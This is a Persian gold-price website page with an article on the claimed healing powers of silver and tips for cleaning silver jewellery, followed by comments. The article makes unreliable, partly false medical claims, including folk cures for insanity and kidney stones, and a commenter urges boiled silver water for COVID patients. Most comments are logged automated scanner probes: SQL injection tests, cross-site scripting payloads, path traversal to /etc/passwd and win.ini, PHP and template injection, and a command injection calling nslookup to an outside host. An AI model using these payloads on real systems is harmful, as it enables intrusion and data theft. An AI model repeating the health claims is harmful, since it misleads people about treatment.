سامانه پیامکی طلا،سکه،ارز،تلفن گویا صفحه حرفه ای قیمت ها !!! اوقات شرعی وساعات نماز

ﺧﻮاص درﻣﺎﻧﯽ ﻧﻘﺮه

ﻧﻘﺮه ﺻﺪ ﻫﺎ ﺑﺎر ﺑﯿﺶ از ﺳﺎﯾﺮ ﻣﻮاد ﺿﺪ ﻋﻔﻮﻧﯽ ﮐﻨﻨﺪه ﻣﻮﺛﺮ اﺳﺖ و 650 ﻣﯿﮑﺮب را از ﺑﯿﻦ ﻣﯽ ﺑﺮد. ﺷﺎﯾﺪ ﺧﻮد ﺷﻤﺎ ﮐﻪ ﻫﻤﯿﺸﻪ ﯾﮏ اﻧﮕﺸﺘﺮ ﻧﻘﺮه ﺑﺎ ﻧﮕﯿﻦ ﻋﻘﯿﻖ در دﺳﺖ دارﯾﺪ، اﻃﻼع ﻧﺪاﺷﺘﻪ ﺑﺎﺷﯿﺪ ﮐﻪ ﭼﻪ ﺧﺎﺻﯿﺖ ﺑﺰرﮔﯽ در اﯾﻦ ﻓﻠﺰ ﮔﺮاﻧﺒﻬﺎ ﻫﺴﺖ و ﭼﮕﻮﻧﻪ ﺑﺪون اﯾﻨﮑﻪ ﺧﻮد ﺑﺪاﻧﯿﺪ ﻣﺮاﻗﺐ ﺳﻼﻣﺖ ﺷﻤﺎﺳﺖ.

ﺧﻮاص درﻣﺎﻧﯽ ﻧﻘﺮه

به تازگی دﮐﺘﺮ ﻫﺎري ﻣﺎرﮐﺮاف اﺳﺘﺎد ﭘﺰﺷﮑﯽ داﻧﺸﮕﺎه سنت دوﯾﺲ ﭘﺲ از آزمایش های ﻣﺘﻌﺪد اﻋﻼم ﮐﺮد ﮐﻪ ﻧﻘﺮه ﺻﺪﻫﺎ ﺑﺎر ﺑﯿﺶ از ﺳﺎﯾﺮ داروﻫﺎي ﺿﺪ ﻋﻔﻮﻧﯽ و ﺿﺪ ﻣﯿﮑﺮب، میکروب ها را از ﺑﯿﻦ ﻣﯽ ﺑﺮد. در ﺣﺎﻟﯿﮑﻪ ﻧﻘﺮه ﺑﻪ ﺗﻨﻬﺎﯾﯽ ﻣﯽ ﺗﻮاﻧﺪ 650 ﻣﯿﮑﺮب را ﻧﺎﺑﻮد ﮐﻨﺪ ﺑﺪون اﯾﻨﮑﻪ ﻣﺎﻧﻨﺪ دﯾﮕﺮ ﺿﺪ عفونی ها ﻋﻮارض ﺑﻌﺪي ﺑﺮ ﺟﺎي ﮔﺬارد.

اﺳﺘﺎد دﯾﮕﺮي ﺑﻨﺎم ﭼﺎﻟﺰ ﻓﻮﮐﺲ داروﯾﯽ از ﻧﻘﺮه ﺗﻬﯿﻪ ﮐﺮده است ﺑﻪ ﻧﺎم ﺳﻮﻟﻔﺎدﯾﺎزﯾﻦ ﻧﻘﺮه، ﮐﻪ در ﻣﻌﺎﻟﺠﻪ ﺳﺮﻣﺎ ﺧﻮردﮔﯽ و ﺟﻮش ﻫﺎي ﭘﻮﺳﺘﯽ و در ﻫﻔﺘﺎد در ﺻﺪ سوختگی های ﺟﻠﺪي ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﻣﯽ ﮔﯿﺮد. ﻫﻤﭽﻨﯿﻦ ﺷﺮ ﮐﺖ ﻫﺎي ﻫﻮاﭘﯿﻤﺎﯾﯽ اﻧﮕﻠﺴﺘﺎن، ﺳﻮﯾﺲ، آﻟﻤﺎن، اﺳﮑﺎﻧﺪﯾﻨﺎوي، ﻓﺮاﻧﺴﻪ،ﮐﺎﻧﺎدا، اﯾﺘﺎﻟﯿﺎ، ژاﭘﻦ و… از آن در داﺧﻞ ﻫﻮاﭘﯿﻤﺎ ﺑﻪ ﻋﻨﻮان ﯾﮏ ﻣﯿﮑﺮب ﮐﺶ ﻗﻮي اﺳﺘﻔﺎده ﻣﯽ ﮐﻨﻨﺪ. ﺣﺘﯽ در ﺳﻮﯾﺲ ﺑﺮاي ﺿﺪ ﻋﻔﻮﻧﯽ ﮐﺮدن آب آﺷﺎﻣﯿﺪﻧﯽ ﺷﻬﺮ نقره به کار می برند. این فلز ارزشمند در ﺗﻔﺮﯾﺢ و دﻟﮕﺸﺎﯾﯽ ﻗﻠﺐ، ﻧﺰدﯾﮏ ﺑﻪ ﯾﺎﻗﻮت اﺳﺖ. ﺑﺮاي ﺑﺪ ﺑﻮﯾﯽ دﻫﺎن و رﻓﻊ رطوبت های ﻟﺰج و ﻋﻔﻮﻧﺖ ﺑﻠﻐﻢ و ﻣﺎﻟﯿﺨﻮﻟﯿﺎ  دﯾﻮاﻧﮕﯽ، وﺳﻮاس، ﺳﺮﻓﻪ، اﺳﺘﺴﻘﺎ، ﻃﺤﺎل، ﺳﻨﮓ ﻣﺜﺎﻧﻪ و ﮐﻠﯿﻪ ﻫﺎ ﺳﻮدﻣﻨﺪ اﺳﺖ.

اﮔﺮ اﻧﮕﺸﺘﺮ ﻧﻘﺮه ﺷﻤﺎ ﺑﻪ ﻫﺮ دﻟﯿﻞ ﻣﺜﻸ ﻣﺠﺎورت ﺑﺎ ﻣﺎﯾﻊ ﺳﻔﯿﺪ ﮐﻨﻨﺪه ﺳﯿﺎه ﺷﺪ ﻧﺎراﺣﺖ ﻧﺒﺎﺷﯿﺪ. آن را ﻣﺪﺗﯽ داﺧﻞ آب ﻧﻤﮏ ﻏﻠﯿﻆ ﺑﯿﻨﺪازﯾﺪ ﺳﭙﺲ ﭼﻨﺪ دﻗﯿﻘﻪ آن را روي ﻓﺮش ﮐﻪ ﭘﺮزدار اﺳﺖ ﻣﺤﮑﻢ ﺑﮑﺸﯿﺪ. ﻣﯽ ﺑﯿﻨﯿﺪ ﮐﻪ ﻣﺜﻞ اول ﺳﻔﯿﺪ ﻣﯽ گردد. اﮔﺮ ﮔﺮدﻧﺒﻨﺪ ﯾﺎ اﻧﮕﺸﺘﺮ ﻧﻘﺮه اي ﺷﻤﺎ ﮐﺪر ﺷﺪه اﺳﺖ ﺑﺎﯾﺪ آﻧﻬﺎ را ﻣﺪﺗﯽ در آب ﻟﯿﻤﻮ ﺑﮕﺬارﯾﺪ و ﺳﭙﺲ ﺑﺎ آب ﮔﺮم ﺑﺸﻮﯾﯿﺪ و ﺑﻌﺪ ﺑﺎ ﯾﮏ ﺗﮑﻪ ﭘﺎرﭼﻪ ﺟﯿﺮ آﻧﻬﺎ را ﺟﻼ دﻫﯿﺪ.

راه دﯾﮕﺮ ﺑﺮاي ﭘﺎك ﮐﺮدن ﻧﻘﺮه ﺟﺎت اﯾﻦ اﺳﺖ ﮐﻪ ﯾﮏ ﻇﺮف ﺑﻪ ﺣﺠﻤﯽ ﮐﻪ ﺑﺘﻮان ﻧﻘﺮه ﻫﺎ را درون آن ﻗﺮار داد ﺗﻬﯿﻪ و ﻣﻘﺪاري ﺳﺮﮐﻪ در آن ﺑﺮﯾﺰﯾﺪ روي ﺷﻌﻠﻪ ﮔﺎز ﺗﺎ بجوشانید و ﺑﻌﺪ آب ﺑﮑﺸﯿﺪ و ﺧﺸﮏ نمایید. همچنین از خمیر دندان و گوش پاک کن نیز می توانید برای پاک کردن زیورآلات نقره خود استفاده کنید.

نظرات
ديدگاه هاي ارسال شده توسط شما، پس از تاييد توسط سايت طلا در وب سايت منتشر خواهد شد
0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:45
-1" OR 3*2>(0+5+556-556) --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:45
-1" OR 3+556-556-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:45
-1" OR 2+556-556-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:45
1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:45
-1 OR 3*2>(0+5+515-515)

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:45
-1 OR 3+515-515-1=0+0+0+1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:44
-1 OR 2+515-515-1=0+0+0+1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:44
-1 OR 3*2>(0+5+840-840) --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:44
-1 OR 3+840-840-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:44
-1 OR 2+840-840-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:44
d0MUNXxh

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:36
1????%2527%2522

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
-1" OR 3*2>(0+5+120-120) --

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
-1" OR 3+120-120-1=0+0+0+1 --

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
-1" OR 2+120-120-1=0+0+0+1 --

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
1

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
-1 OR 3*2>(0+5+922-922)

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
-1 OR 3+922-922-1=0+0+0+1

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
-1 OR 2+922-922-1=0+0+0+1

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
-1 OR 3*2>(0+5+830-830) --

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
-1 OR 3+830-830-1=0+0+0+1 --

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
-1 OR 2+830-830-1=0+0+0+1 --

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:18
6Ii3mxoF

0 0

ikgzMOBX 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:16
1????%2527%2522

0 0

فرزانه حمزوی میخواستم 51 سال میگه :

تاریخ: 1399/06/31 ساعت 20:36
سلام میخواستم ی مقدار در مورد نقره صحبت کنید آیا میکروب کش هستش

0 0

WeliBeecy 51 سال میگه :

تاریخ: 1399/04/20 ساعت 04:20
get free credit report how to raise credit score transunion credit report dispute credit score range

0 0

نسرین 51 سال میگه :

تاریخ: 1398/12/18 ساعت 00:18
سلام خیلی وقته میخوام ازتون خواهش کنم از آب جوشانده یه تیکه نقره برا بیماران کرونایی استفاده کنید توروخدا اینوازلحاظ علمی ثابت کنید من نتونستم پزشک بشم اما ازپزشکان عزیزکشورمیخوام دارویی ازاین روش تهیه کنندجواب میده انشاا..

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1DJK3Y[!+!]

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1SjVMn
WYRw(9455)

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1}body{acu:Expre/**/SSion(WYRw(9310))}

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
[url=][/url]

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
?

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1<ScRiPt>WYRw(9953)</sCripT>

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1u003CScRiPtWYRw(9236)u003C/sCripTu003E

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
%31%3C%53%63%52%69%50%74%20%3E%57%59%52%77%289776%29%3C%2F%73%43%72%69%70%54%3E

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
1WYRw(9228)

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
1

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
1WYRw(9917)

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
1WYRw(9373)

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
1WYRw(9208)

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
106TQ7[!+!]

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
1WYRw(9143)

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
{{10000396*9999841}}

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
CWS000x?=?1N?
]s??0Q?L

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
acux8358??z1??z2a?bcxuca8358

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
acu9967<s1﹥s2ʺs3ʹuca9967

0 0

sdoflium 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
19125016

0 0

wdtrfvol 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
/www.vulnweb.com

0 0

fhsfvdda 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
1????%2527%2522

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

erarriou 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
index.php/.

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
................windowswin.ini

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
????????????????????????????????????????????????windows??win.ini

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
../../../../../../../../../../windows/win.ini.jpg

0 0

erarriou 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
index.php

0 0

eytusnhl 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
C:WINDOWSsystem32driversetchosts

0 0

xpshroin 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
${

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
../../../../../../../../../../windows/win.ini

0 0

xpshroin 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
";print(md5(acunetix_wvs_security_test));$a="

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
WEB-INFweb.xml

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
/WEB-INF/web.xml

0 0

xpshroin 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
;print(md5(acunetix_wvs_security_test));

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
WEB-INF/web.xml

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
/../../../../../../../etc/passwd

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

dwddihhp 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
testasp.vulnweb.com

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
..??..??..??..??..??..??..??..??etc/passwd

0 0

dwddihhp 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

dwddihhp 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

dwddihhp 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
1some_inexistent_file_with_long_name.jpg

0 0

dwddihhp 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
%2fetc%2fpasswd

0 0

fsuvsjmf 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
${9999794+10000060}

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
/etc/passwd

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
../../../../../../../../../../etc/passwd.jpg

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
../../../../../../../../../../../../../../../proc/version

0 0

cxxlwttu 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
to
bcc:013405.51-2768.51.8a710.1

0 0

gylpoygv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
../../../../../../../../../../etc/passwd

0 0

cxxlwttu 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
1
bcc:013405.51-2767.51.8a710.1

0 0

rmhslfet 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
HD6WD0j6

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
0

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
0

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
0

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
0

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
0

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
0

0 0

bgsnxurw 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
$(nslookup dns.ce.13405.51-2745.51.8a710.1.bxss.me)

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
0

0 0

bgsnxurw 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
set|set&set

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
0

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:51
0

0 0

hsbxupfw 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:50
1

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:50
-1" OR 2+886-886-1=0+0+0+1 --

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:50
-1 OR 2+165-165-1=0+0+0+1

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:50
-1 OR 2+529-529-1=0+0+0+1 --

0 0

yrhusdht 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:50
3K6BsMpD

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1HQV7W[!+!]

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1XOpSM
JSN8(9774)

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1}body{acu:Expre/**/SSion(JSN8(9260))}

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
[url=][/url]

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
?

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1<ScRiPt>JSN8(9213)</sCripT>

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1u003CScRiPtJSN8(9173)u003C/sCripTu003E

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
%31%3C%53%63%52%69%50%74%20%3E%4A%53%4E%38%289592%29%3C%2F%73%43%72%69%70%54%3E

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1JSN8(9962)

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1JSN8(9341)

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1JSN8(9693)

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1JSN8(9808)

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1NIDUZ[!+!]

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
1JSN8(9595)

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:48
{{10000177*9999919}}

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
CWS000x?=?1N?
]s??0Q?L

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
acux7489??z1??z2a?bcxuca7489

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
acu4204<s1﹥s2ʺs3ʹuca4204

0 0

bdtxjbaw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
19684530

0 0

nkthvtpc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
/www.vulnweb.com

0 0

uyveinji 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
1????%2527%2522

0 0

lwgprdrv 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
index.php/.

0 0

lwgprdrv 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
index.php

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

pfjedcbp 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
${

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

pfjedcbp 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
";print(md5(acunetix_wvs_security_test));$a="

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

pfjedcbp 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
;print(md5(acunetix_wvs_security_test));

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
................windowswin.ini

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
????????????????????????????????????????????????windows??win.ini

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
../../../../../../../../../../windows/win.ini.jpg

0 0

lpssvirh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
testasp.vulnweb.com

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
C:WINDOWSsystem32driversetchosts

0 0

lpssvirh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
../../../../../../../../../../windows/win.ini

0 0

lpssvirh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47

0 0

lpssvirh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
1some_inexistent_file_with_long_name.jpg

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
WEB-INFweb.xml

0 0

lpssvirh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
/WEB-INF/web.xml

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
WEB-INF/web.xml

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
/../../../../../../../etc/passwd

0 0

polrlglk 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
${10000346+9999296}

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
..??..??..??..??..??..??..??..??etc/passwd

0 0

